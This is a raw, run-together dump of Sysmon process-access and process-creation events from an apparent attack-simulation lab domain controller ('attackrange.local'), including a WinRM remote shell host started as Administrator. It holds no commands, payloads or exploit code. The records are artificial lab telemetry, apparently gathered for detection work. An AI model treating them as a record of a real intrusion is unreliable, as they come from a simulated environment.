15:50:24.950{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000572Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.950{D28789B6-7AD2-5FA1-1400-000000008701}13681464C:\Windows\system32\svchost.exe{D28789B6-7C40-5FA1-1003-000000008701}4572C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000571Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.950{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C40-5FA1-1003-000000008701}4572C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000570Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.935{D28789B6-7C40-5FA1-1103-000000008701}34363044C:\Windows\system32\conhost.exe{D28789B6-7C40-5FA1-1003-000000008701}4572C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000569Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.935{D28789B6-7AC1-5FA1-0500-000000008701}636760C:\Windows\system32\csrss.exe{D28789B6-7C40-5FA1-1103-000000008701}3436C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000568Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.919{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000567Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.919{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000566Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.919{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000565Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.919{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000564Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.919{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000563Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.919{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000562Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.919{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000561Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.919{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000560Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.919{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000559Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.919{D28789B6-7AC1-5FA1-0500-000000008701}636652C:\Windows\system32\csrss.exe{D28789B6-7C40-5FA1-1003-000000008701}4572C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000558Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.919{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C40-5FA1-1003-000000008701}4572C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000557Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.932{D28789B6-7C40-5FA1-1003-000000008701}4572C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7C40-5FA1-8641-110000000000}0x1141860HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7AD1-5FA1-0C00-000000008701}572C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000556Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.919{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000555Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.919{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000554Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.919{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000553Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.903{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000552Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.903{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000551Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.903{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000550Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.841{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000549Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.841{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000548Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 